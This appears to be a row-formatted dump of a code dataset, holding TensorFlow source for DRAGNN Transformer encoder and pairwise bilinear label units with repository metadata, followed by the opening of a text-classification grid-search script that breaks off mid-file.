hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f73253edbec788340fa63d923f7d8dd39807876f | 24,052 | py | Python | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | 1 | 2019-09-11T09:41:11.000Z | 2019-09-11T09:41:11.000Z | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | null | null | null | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Network units implementing the Transformer network (Vaswani et al. 2017).
Heavily adapted from the tensor2tensor implementation of the Transformer,
described in detail here: https://arxiv.org/abs/1706.03762.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from dragnn.python import network_units
def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):
"""Adds a bunch of sinusoids of different frequencies to a Tensor.
Each channel of the input Tensor is incremented by a sinusoid of a different
frequency and phase.
This allows attention to learn to use absolute and relative positions.
Timing signals should be added to some precursors of both the query and the
memory inputs to attention.
The use of relative position is possible because sin(x+y) and cos(x+y) can be
expressed in terms of y, sin(x) and cos(x).
In particular, we use a geometric sequence of timescales starting with
min_timescale and ending with max_timescale. The number of different
timescales is equal to channels / 2. For each timescale, we
generate the two sinusoidal signals sin(timestep/timescale) and
cos(timestep/timescale). All of these sinusoids are concatenated in
the channels dimension.
Args:
x: a Tensor with shape [batch, length, channels]
min_timescale: a float
max_timescale: a float
Returns:
a Tensor the same shape as x.
"""
length = tf.shape(x)[1]
channels = tf.shape(x)[2]
pos = tf.to_float(tf.range(length))
num_timescales = channels // 2
log_timescale_increment = (
np.log(float(max_timescale) / float(min_timescale)) /
(tf.to_float(num_timescales) - 1))
inv_timescales = min_timescale * tf.exp(
tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)
scaled_time = tf.expand_dims(pos, 1) * tf.expand_dims(inv_timescales, 0)
signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)
signal = tf.pad(signal, [[0, 0], [0, tf.mod(channels, 2)]])
signal = tf.reshape(signal, [1, length, channels])
return x + signal
def split_last_dimension(x, n):
"""Partitions x so that the last dimension becomes two dimensions.
The first of these two dimensions is n.
Args:
x: a Tensor with shape [..., m]
n: an integer.
Returns:
a Tensor with shape [..., n, m/n]
"""
old_shape = x.get_shape().dims
last = old_shape[-1]
new_shape = old_shape[:-1] + [n] + [last // n if last else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [n, -1]], 0))
ret.set_shape(new_shape)
return ret
def combine_last_two_dimensions(x):
"""Reshape x so that the last two dimensions become one.
Args:
x: a Tensor with shape [..., a, b]
Returns:
a Tensor with shape [..., ab]
"""
old_shape = x.get_shape().dims
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))
ret.set_shape(new_shape)
return ret
def split_heads(x, num_heads):
"""Splits channels (dimension 3) into multiple heads (becomes dimension 1).
Args:
x: a Tensor with shape [batch, length, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, num_heads, length, channels / num_heads]
"""
return tf.transpose(split_last_dimension(x, num_heads), [0, 2, 1, 3])
def combine_heads(x):
"""Performs the inverse of split_heads.
Args:
x: a Tensor with shape [batch, num_heads, length, channels / num_heads]
Returns:
a Tensor with shape [batch, length, channels]
"""
return combine_last_two_dimensions(tf.transpose(x, [0, 2, 1, 3]))
def compute_padding_mask(lengths):
"""Computes an additive mask for padding.
Given the non-padded sequence lengths for the batch, computes a mask that will
send padding attention to 0 when added to logits before applying a softmax.
Args:
lengths: a Tensor containing the sequence length of each batch element
Returns:
A Tensor of shape [batch_size, 1, 1, max_len] with zeros in non-padding
entries and -1e9 in padding entries.
"""
lengths = tf.reshape(lengths, [-1])
mask = tf.sequence_mask(lengths)
# This will be used as an additive mask, so we want the inverse of the mask
# produced by tf.sequence_mask.
inv_mask = tf.to_float(tf.logical_not(mask))
mem_padding = inv_mask * -1e9
return tf.expand_dims(tf.expand_dims(mem_padding, 1), 1)
def dot_product_attention(queries, keys, values, dropout_keep_rate, bias=None):
"""Computes dot-product attention.
Args:
queries: a Tensor with shape [batch, heads, seq_len, depth_keys]
keys: a Tensor with shape [batch, heads, seq_len, depth_keys]
values: a Tensor with shape [batch, heads, seq_len, depth_values]
dropout_keep_rate: dropout proportion of units to keep
bias: A bias to add before applying the softmax, or None. This can be used
for masking padding in the batch.
Returns:
A Tensor with shape [batch, heads, seq_len, depth_values].
"""
# [batch, num_heads, seq_len, seq_len]
logits = tf.matmul(queries, keys, transpose_b=True)
if bias is not None:
logits += bias
attn_weights = tf.nn.softmax(logits)
# Dropping out the attention links for each of the heads
attn_weights = network_units.maybe_apply_dropout(attn_weights,
dropout_keep_rate,
False)
return tf.matmul(attn_weights, values)
def residual(old_input, new_input, dropout_keep_rate, layer_norm):
"""Residual layer combining old_input and new_input.
Computes old_input + dropout(new_input) if layer_norm is None; otherwise:
layer_norm(old_input + dropout(new_input)).
Args:
old_input: old float32 Tensor input to residual layer
new_input: new float32 Tensor input to residual layer
dropout_keep_rate: dropout proportion of units to keep
layer_norm: network_units.LayerNorm to apply to residual output, or None
Returns:
float32 Tensor output of residual layer.
"""
res_sum = old_input + network_units.maybe_apply_dropout(new_input,
dropout_keep_rate,
False)
return layer_norm.normalize(res_sum) if layer_norm else res_sum
def mlp(component, input_tensor, dropout_keep_rate, depth):
"""Feed the input through an MLP.
Each layer except the last is followed by a ReLU activation and dropout.
Args:
component: the DRAGNN Component containing parameters for the MLP
input_tensor: the float32 Tensor input to the MLP.
dropout_keep_rate: dropout proportion of units to keep
depth: depth of the MLP.
Returns:
the float32 output Tensor
"""
for i in range(depth):
ff_weights = component.get_variable('ff_weights_%d' % i)
input_tensor = tf.nn.conv2d(input_tensor,
ff_weights,
[1, 1, 1, 1],
padding='SAME')
# Apply ReLU and dropout to all but the last layer
if i < depth - 1:
input_tensor = tf.nn.relu(input_tensor)
input_tensor = network_units.maybe_apply_dropout(input_tensor,
dropout_keep_rate,
False)
return input_tensor
class TransformerEncoderNetwork(network_units.NetworkUnitInterface):
"""Implementation of the Transformer network encoder."""
def __init__(self, component):
"""Initializes parameters for this Transformer unit.
Args:
component: parent ComponentBuilderBase object.
Parameters used to construct the network:
num_layers: number of transformer layers (attention + MLP)
hidden_size: size of hidden layers in MLPs
filter_size: filter width for each attention head
num_heads: number of attention heads
residual_dropout: dropout keep rate for residual layers
attention_dropout: dropout keep rate for attention weights
mlp_dropout: dropout keep rate for mlp layers
initialization: initialization scheme to use for model parameters
bias_init: initial value for bias parameters
scale_attention: whether to scale attention parameters by filter_size^-0.5
layer_norm_residuals: whether to perform layer normalization on residual
layers
timing_signal: whether to add a position-wise timing signal to the input
kernel: kernel width in middle MLP layers
mlp_layers: number of MLP layers. Must be >= 2.
Raises:
ValueError: if mlp_layers < 2.
The input depth of the first layer is inferred from the total concatenated
size of the input features, minus 1 to account for the sequence lengths.
Hyperparameters used:
dropout_rate: The probability that an input is not dropped. This is the
default when the |dropout_keep_prob| parameter is unset.
"""
super(TransformerEncoderNetwork, self).__init__(component)
default_dropout_rate = component.master.hyperparams.dropout_rate
self._attrs = network_units.get_attrs_with_defaults(
component.spec.network_unit.parameters, defaults={
'num_layers': 4,
'hidden_size': 256,
'filter_size': 64,
'num_heads': 8,
'residual_drop': default_dropout_rate,
'attention_drop': default_dropout_rate,
'mlp_drop': default_dropout_rate,
'initialization': 'xavier',
'bias_init': 0.001,
'scale_attention': True,
'layer_norm_residuals': True,
'timing_signal': True,
'kernel': 1,
'mlp_layers': 2})
self._num_layers = self._attrs['num_layers']
self._hidden_size = self._attrs['hidden_size']
self._filter_size = self._attrs['filter_size']
self._num_heads = self._attrs['num_heads']
self._residual_dropout = self._attrs['residual_drop']
self._attention_dropout = self._attrs['attention_drop']
self._mlp_dropout = self._attrs['mlp_drop']
self._initialization = self._attrs['initialization']
self._bias_init = self._attrs['bias_init']
self._scale_attn = self._attrs['scale_attention']
self._layer_norm_res = self._attrs['layer_norm_residuals']
self._timing_signal = self._attrs['timing_signal']
self._kernel = self._attrs['kernel']
self._mlp_depth = self._attrs['mlp_layers']
if self._mlp_depth < 2:
raise ValueError('TransformerEncoderNetwork needs mlp_layers >= 2')
self._combined_filters = self._num_heads * self._filter_size
self._weights = []
self._biases = []
self._layer_norms = {}
# Hacky: one dimension comes from the lengths input; subtract it.
self._concatenated_input_dim -= 1
# Initial projection of inputs, this is mainly to project input down to the
# right size for residual layers
proj_shape = [1, 1, self._concatenated_input_dim, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('init_proj', proj_shape,
self._initialization))
self._biases.append(tf.get_variable('init_bias',
self._combined_filters,
initializer=tf.constant_initializer(
self._bias_init),
dtype=tf.float32))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i):
# Attention weights: 3 * self.combined_filters = (q, k, v)
# We assume that q, k and v all have the same dimension
attn_shape = [1, 1, self._combined_filters, 3 * self._combined_filters]
self._weights.append(
network_units.add_var_initialized('attn_weights',
attn_shape,
self._initialization))
# Attention final projection weights
proj_shape = [1, 1, self._combined_filters, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('proj_weights',
proj_shape,
self._initialization))
# MLP weights
with tf.variable_scope('mlp'):
ff_shape = [1, 1, self._combined_filters, self._hidden_size]
self._weights.append(
network_units.add_var_initialized('ff_weights_0',
ff_shape,
self._initialization))
ff_shape = [1, self._kernel, self._hidden_size, self._hidden_size]
for j in range(1, self._mlp_depth - 1):
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' % j,
ff_shape,
self._initialization))
ff_shape = [1, 1, self._hidden_size, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' %
(self._mlp_depth - 1),
ff_shape,
self._initialization))
# Layer normalization for residual layers
if self._layer_norm_res:
attn_layer_norm = network_units.LayerNorm(component,
'attn_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['attn_layer_norm_%d' % i] = attn_layer_norm
ff_layer_norm = network_units.LayerNorm(component,
'ff_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['ff_layer_norm_%d' % i] = ff_layer_norm
# Layer norm parameters are not added to self._weights,
# which means that they are not l2 regularized
self._params.extend(attn_layer_norm.params + ff_layer_norm.params)
self._params.extend(self._weights)
self._params.extend(self._biases)
self._regularized_weights.extend(self._weights)
self._layers.append(
network_units.Layer(component, name='transformer_output',
dim=self._combined_filters))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
"""Requires |stride|; otherwise see base class."""
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("TransformerEncoderNetwork needs 'stride' and must be "
"called in the bulk feature extractor component.")
lengths = network_units.lookup_named_tensor('lengths', linked_embeddings)
lengths_s = tf.to_int32(tf.squeeze(lengths.tensor, [1]))
num_steps = tf.reduce_max(lengths_s)
in_tensor = network_units.lookup_named_tensor('features', linked_embeddings)
input_tensor = tf.reshape(in_tensor.tensor, [stride, num_steps, -1])
if self._timing_signal:
input_tensor = add_timing_signal_1d(input_tensor)
# Adds a dimension for conv2d
input_tensor = tf.expand_dims(input_tensor, 1)
# For masking padding in attention
mask = compute_padding_mask(lengths_s)
conv = tf.nn.conv2d(input_tensor,
self._component.get_variable('init_proj'),
[1, 1, 1, 1], padding='SAME')
conv = tf.nn.bias_add(conv, self._component.get_variable('init_bias'))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i, reuse=True):
attn_weights = self._component.get_variable('attn_weights')
attn_combined = tf.nn.conv2d(conv,
attn_weights,
[1, 1, 1, 1],
padding='SAME')
attn_combined = tf.squeeze(attn_combined, 1)
# Splits combined projection into queries, keys, and values
queries, keys, values = tf.split(attn_combined,
[self._combined_filters]*3,
axis=2)
# Splits each of queries, keys, values into attention heads
queries = split_heads(queries, self._num_heads)
keys = split_heads(keys, self._num_heads)
values = split_heads(values, self._num_heads)
if self._scale_attn:
queries *= self._filter_size**-0.5
# Performs dot product attention and concatenates the resulting heads
attended = dot_product_attention(queries, keys, values,
self._attention_dropout, mask)
attended = combine_heads(attended)
# Projects combined heads
attended = tf.expand_dims(attended, 1)
proj = tf.nn.conv2d(attended,
self._component.get_variable('proj_weights'),
[1, 1, 1, 1],
padding='SAME')
# Residual connection between input and attended input
attn_layer_norm_params = None
if self._layer_norm_res:
attn_layer_norm_params = self._layer_norms['attn_layer_norm_%d' % i]
proj_res = residual(conv, proj, self._residual_dropout,
attn_layer_norm_params)
# Feed forward
with tf.variable_scope('mlp'):
ff = mlp(self._component, proj_res, self._mlp_dropout,
self._mlp_depth)
# Residual connection between attended input and feed forward layers
ff_layer_norm_params = None
if self._layer_norm_res:
ff_layer_norm_params = self._layer_norms['ff_layer_norm_%d' % i]
conv = residual(proj_res, ff, self._residual_dropout,
ff_layer_norm_params)
return [tf.reshape(conv, [-1, self._combined_filters],
name='reshape_activations')]
class PairwiseBilinearLabelNetwork(network_units.NetworkUnitInterface):
r"""Network unit that computes pairwise bilinear label scores.
Given source and target representations for each token, this network unit
computes bilinear scores for each label for each of the N^2 combinations of
source and target tokens, rather than for only N already-computed
source/target pairs (as is performed by the biaffine_units). The output is
suitable as input to e.g. the heads_labels transition system.
Specifically, a weights tensor W called `bilinear' is used to compute bilinear
scores B for input tensors S and T:
B_{bnml} = \sum_{i,j} S_{bni} W_{ilj} T{bmj}
for batches b, steps n and m and labels l.
Parameters:
num_labels: The number of dependency labels, L.
Features:
sources: [B * N, S] matrix of batched activations for source tokens.
targets: [B * N, T] matrix of batched activations for target tokens.
Layers:
bilinear_scores: [B * N, N * L] matrix where vector b*N*N*L+t contains
per-label scores for all N possible arcs from token t in
batch b.
"""
def __init__(self, component):
super(PairwiseBilinearLabelNetwork, self).__init__(component)
parameters = component.spec.network_unit.parameters
self._num_labels = int(parameters['num_labels'])
self._source_dim = self._linked_feature_dims['sources']
self._target_dim = self._linked_feature_dims['targets']
self._weights = []
self._weights.append(
network_units.add_var_initialized('bilinear',
[self._source_dim,
self._num_labels,
self._target_dim],
'xavier'))
self._params.extend(self._weights)
self._regularized_weights.extend(self._weights)
self._layers.append(network_units.Layer(component,
name='bilinear_scores',
dim=self._num_labels))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
"""Requires |stride|; otherwise see base class."""
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("PairwiseBilinearLabelNetwork needs 'stride' and must "
"be called in a bulk component.")
sources = network_units.lookup_named_tensor('sources', linked_embeddings)
sources_tensor = tf.reshape(sources.tensor, [stride, -1, self._source_dim])
targets = network_units.lookup_named_tensor('targets', linked_embeddings)
targets_tensor = tf.reshape(targets.tensor, [stride, -1, self._target_dim])
# Dimensions: source_dim x num_labels x target_dim
bilinear_params = self._component.get_variable('bilinear')
# Ensures that num_steps is the same for both inputs
num_steps = tf.shape(sources_tensor)[1]
with tf.control_dependencies([tf.assert_equal(num_steps,
tf.shape(targets_tensor)[1],
name='num_steps_mismatch')]):
# Dimensions:
# (batch_size*num_steps x source_dim) *
# (source_dim x num_labels*target_dim)
# = (batch_size*num_steps x num_labels*target_dim)
lin = tf.matmul(tf.reshape(sources_tensor, [-1, self._source_dim]),
tf.reshape(bilinear_params, [self._source_dim, -1]))
# (batch_size x num_steps*num_labels x target_dim) *
# (batch_size x num_steps x target_dim)^T
# = (batch_size x num_steps*num_labels x num_steps)
bilin = tf.matmul(
tf.reshape(lin, [-1, num_steps*self._num_labels, self._target_dim]),
targets_tensor, transpose_b=True)
# (batch_size x num_steps*num_labels x num_steps) ->
# (batch_size x num_steps x num_steps*num_labels)
scores = tf.transpose(bilin, [0, 2, 1])
return [tf.reshape(scores, [-1, num_steps*self._num_labels],
name='reshape_activations')]
| 41.11453 | 81 | 0.61866 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from dragnn.python import network_units
def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):
length = tf.shape(x)[1]
channels = tf.shape(x)[2]
pos = tf.to_float(tf.range(length))
num_timescales = channels // 2
log_timescale_increment = (
np.log(float(max_timescale) / float(min_timescale)) /
(tf.to_float(num_timescales) - 1))
inv_timescales = min_timescale * tf.exp(
tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)
scaled_time = tf.expand_dims(pos, 1) * tf.expand_dims(inv_timescales, 0)
signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)
signal = tf.pad(signal, [[0, 0], [0, tf.mod(channels, 2)]])
signal = tf.reshape(signal, [1, length, channels])
return x + signal
def split_last_dimension(x, n):
old_shape = x.get_shape().dims
last = old_shape[-1]
new_shape = old_shape[:-1] + [n] + [last // n if last else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [n, -1]], 0))
ret.set_shape(new_shape)
return ret
def combine_last_two_dimensions(x):
old_shape = x.get_shape().dims
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))
ret.set_shape(new_shape)
return ret
def split_heads(x, num_heads):
return tf.transpose(split_last_dimension(x, num_heads), [0, 2, 1, 3])
def combine_heads(x):
return combine_last_two_dimensions(tf.transpose(x, [0, 2, 1, 3]))
def compute_padding_mask(lengths):
lengths = tf.reshape(lengths, [-1])
mask = tf.sequence_mask(lengths)
inv_mask = tf.to_float(tf.logical_not(mask))
mem_padding = inv_mask * -1e9
return tf.expand_dims(tf.expand_dims(mem_padding, 1), 1)
def dot_product_attention(queries, keys, values, dropout_keep_rate, bias=None):
logits = tf.matmul(queries, keys, transpose_b=True)
if bias is not None:
logits += bias
attn_weights = tf.nn.softmax(logits)
attn_weights = network_units.maybe_apply_dropout(attn_weights,
dropout_keep_rate,
False)
return tf.matmul(attn_weights, values)
def residual(old_input, new_input, dropout_keep_rate, layer_norm):
res_sum = old_input + network_units.maybe_apply_dropout(new_input,
dropout_keep_rate,
False)
return layer_norm.normalize(res_sum) if layer_norm else res_sum
def mlp(component, input_tensor, dropout_keep_rate, depth):
for i in range(depth):
ff_weights = component.get_variable('ff_weights_%d' % i)
input_tensor = tf.nn.conv2d(input_tensor,
ff_weights,
[1, 1, 1, 1],
padding='SAME')
if i < depth - 1:
input_tensor = tf.nn.relu(input_tensor)
input_tensor = network_units.maybe_apply_dropout(input_tensor,
dropout_keep_rate,
False)
return input_tensor
class TransformerEncoderNetwork(network_units.NetworkUnitInterface):
def __init__(self, component):
super(TransformerEncoderNetwork, self).__init__(component)
default_dropout_rate = component.master.hyperparams.dropout_rate
self._attrs = network_units.get_attrs_with_defaults(
component.spec.network_unit.parameters, defaults={
'num_layers': 4,
'hidden_size': 256,
'filter_size': 64,
'num_heads': 8,
'residual_drop': default_dropout_rate,
'attention_drop': default_dropout_rate,
'mlp_drop': default_dropout_rate,
'initialization': 'xavier',
'bias_init': 0.001,
'scale_attention': True,
'layer_norm_residuals': True,
'timing_signal': True,
'kernel': 1,
'mlp_layers': 2})
self._num_layers = self._attrs['num_layers']
self._hidden_size = self._attrs['hidden_size']
self._filter_size = self._attrs['filter_size']
self._num_heads = self._attrs['num_heads']
self._residual_dropout = self._attrs['residual_drop']
self._attention_dropout = self._attrs['attention_drop']
self._mlp_dropout = self._attrs['mlp_drop']
self._initialization = self._attrs['initialization']
self._bias_init = self._attrs['bias_init']
self._scale_attn = self._attrs['scale_attention']
self._layer_norm_res = self._attrs['layer_norm_residuals']
self._timing_signal = self._attrs['timing_signal']
self._kernel = self._attrs['kernel']
self._mlp_depth = self._attrs['mlp_layers']
if self._mlp_depth < 2:
raise ValueError('TransformerEncoderNetwork needs mlp_layers >= 2')
self._combined_filters = self._num_heads * self._filter_size
self._weights = []
self._biases = []
self._layer_norms = {}
self._concatenated_input_dim -= 1
proj_shape = [1, 1, self._concatenated_input_dim, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('init_proj', proj_shape,
self._initialization))
self._biases.append(tf.get_variable('init_bias',
self._combined_filters,
initializer=tf.constant_initializer(
self._bias_init),
dtype=tf.float32))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i):
attn_shape = [1, 1, self._combined_filters, 3 * self._combined_filters]
self._weights.append(
network_units.add_var_initialized('attn_weights',
attn_shape,
self._initialization))
proj_shape = [1, 1, self._combined_filters, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('proj_weights',
proj_shape,
self._initialization))
with tf.variable_scope('mlp'):
ff_shape = [1, 1, self._combined_filters, self._hidden_size]
self._weights.append(
network_units.add_var_initialized('ff_weights_0',
ff_shape,
self._initialization))
ff_shape = [1, self._kernel, self._hidden_size, self._hidden_size]
for j in range(1, self._mlp_depth - 1):
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' % j,
ff_shape,
self._initialization))
ff_shape = [1, 1, self._hidden_size, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' %
(self._mlp_depth - 1),
ff_shape,
self._initialization))
if self._layer_norm_res:
attn_layer_norm = network_units.LayerNorm(component,
'attn_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['attn_layer_norm_%d' % i] = attn_layer_norm
ff_layer_norm = network_units.LayerNorm(component,
'ff_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['ff_layer_norm_%d' % i] = ff_layer_norm
self._params.extend(attn_layer_norm.params + ff_layer_norm.params)
self._params.extend(self._weights)
self._params.extend(self._biases)
self._regularized_weights.extend(self._weights)
self._layers.append(
network_units.Layer(component, name='transformer_output',
dim=self._combined_filters))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("TransformerEncoderNetwork needs 'stride' and must be "
"called in the bulk feature extractor component.")
lengths = network_units.lookup_named_tensor('lengths', linked_embeddings)
lengths_s = tf.to_int32(tf.squeeze(lengths.tensor, [1]))
num_steps = tf.reduce_max(lengths_s)
in_tensor = network_units.lookup_named_tensor('features', linked_embeddings)
input_tensor = tf.reshape(in_tensor.tensor, [stride, num_steps, -1])
if self._timing_signal:
input_tensor = add_timing_signal_1d(input_tensor)
input_tensor = tf.expand_dims(input_tensor, 1)
mask = compute_padding_mask(lengths_s)
conv = tf.nn.conv2d(input_tensor,
self._component.get_variable('init_proj'),
[1, 1, 1, 1], padding='SAME')
conv = tf.nn.bias_add(conv, self._component.get_variable('init_bias'))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i, reuse=True):
attn_weights = self._component.get_variable('attn_weights')
attn_combined = tf.nn.conv2d(conv,
attn_weights,
[1, 1, 1, 1],
padding='SAME')
attn_combined = tf.squeeze(attn_combined, 1)
queries, keys, values = tf.split(attn_combined,
[self._combined_filters]*3,
axis=2)
queries = split_heads(queries, self._num_heads)
keys = split_heads(keys, self._num_heads)
values = split_heads(values, self._num_heads)
if self._scale_attn:
queries *= self._filter_size**-0.5
attended = dot_product_attention(queries, keys, values,
self._attention_dropout, mask)
attended = combine_heads(attended)
attended = tf.expand_dims(attended, 1)
proj = tf.nn.conv2d(attended,
self._component.get_variable('proj_weights'),
[1, 1, 1, 1],
padding='SAME')
attn_layer_norm_params = None
if self._layer_norm_res:
attn_layer_norm_params = self._layer_norms['attn_layer_norm_%d' % i]
proj_res = residual(conv, proj, self._residual_dropout,
attn_layer_norm_params)
with tf.variable_scope('mlp'):
ff = mlp(self._component, proj_res, self._mlp_dropout,
self._mlp_depth)
ff_layer_norm_params = None
if self._layer_norm_res:
ff_layer_norm_params = self._layer_norms['ff_layer_norm_%d' % i]
conv = residual(proj_res, ff, self._residual_dropout,
ff_layer_norm_params)
return [tf.reshape(conv, [-1, self._combined_filters],
name='reshape_activations')]
class PairwiseBilinearLabelNetwork(network_units.NetworkUnitInterface):
def __init__(self, component):
super(PairwiseBilinearLabelNetwork, self).__init__(component)
parameters = component.spec.network_unit.parameters
self._num_labels = int(parameters['num_labels'])
self._source_dim = self._linked_feature_dims['sources']
self._target_dim = self._linked_feature_dims['targets']
self._weights = []
self._weights.append(
network_units.add_var_initialized('bilinear',
[self._source_dim,
self._num_labels,
self._target_dim],
'xavier'))
self._params.extend(self._weights)
self._regularized_weights.extend(self._weights)
self._layers.append(network_units.Layer(component,
name='bilinear_scores',
dim=self._num_labels))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("PairwiseBilinearLabelNetwork needs 'stride' and must "
"be called in a bulk component.")
sources = network_units.lookup_named_tensor('sources', linked_embeddings)
sources_tensor = tf.reshape(sources.tensor, [stride, -1, self._source_dim])
targets = network_units.lookup_named_tensor('targets', linked_embeddings)
targets_tensor = tf.reshape(targets.tensor, [stride, -1, self._target_dim])
bilinear_params = self._component.get_variable('bilinear')
num_steps = tf.shape(sources_tensor)[1]
with tf.control_dependencies([tf.assert_equal(num_steps,
tf.shape(targets_tensor)[1],
name='num_steps_mismatch')]):
lin = tf.matmul(tf.reshape(sources_tensor, [-1, self._source_dim]),
tf.reshape(bilinear_params, [self._source_dim, -1]))
bilin = tf.matmul(
tf.reshape(lin, [-1, num_steps*self._num_labels, self._target_dim]),
targets_tensor, transpose_b=True)
scores = tf.transpose(bilin, [0, 2, 1])
return [tf.reshape(scores, [-1, num_steps*self._num_labels],
name='reshape_activations')]
| true | true |
f732540c032f69259ef86b76fd0153508799d6e2 | 4,475 | py | Python | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 58 | 2018-05-17T03:48:05.000Z | 2020-12-20T20:39:55.000Z | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 5 | 2018-05-17T01:58:08.000Z | 2020-12-16T18:38:05.000Z | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 10 | 2018-06-08T20:18:20.000Z | 2021-06-06T17:44:38.000Z | #!/usr/bin/env python
import sys
import os
import os.path
import copy
import subprocess
from operator import mul
from random import shuffle
from operator import mul
from functools import reduce
dirs=['stanford_sentiment_binary', 'amazon_reviews', 'ROC_stories', 'stanford_sentiment_binary_100',
'stanford_sentiment_binary_500', 'stanford_sentiment_binary_1000', 'stanford_sentiment_binary_2500',
'amazon_reviews_100', 'amazon_reviews_500', 'amazon_reviews_1000', 'amazon_reviews_2500',
'amazon_reviews_5000', 'amazon_reviews_10000']
n_dirs=len(dirs)
WORK = os.environ['HOME']
model_dir = WORK + "/work/soft_patterns/"
resource_dir = WORK + "/resources/"
def main(args):
gpu = None
starting_point = 0
indices_to_run = None
if len(args) < 4:
print("Usage:", args[0], "<dataset> <file name> <n instsances> <gpu (optional)> <starting point = 0> <specific instances to run>")
print("Dirs are:")
for i in range(n_dirs):
print("{}: {}".format(i, dirs[i]))
return -1
elif len(args) > 4:
gpu = args[4]
if len(args) > 5:
starting_point = int(args[5])
if len(args) > 6:
indices_to_run = set([int(x) for x in args[6].split(",")])
ddir = dirs[int(args[1])]
data_dir = resource_dir + "/text_cat/" + ddir
n_instances = int(args[3])
file_name = args[2]
name = ddir+'_'+".".join(file_name.split("/")[-1].split(".")[:-1])
with open(file_name) as ifh:
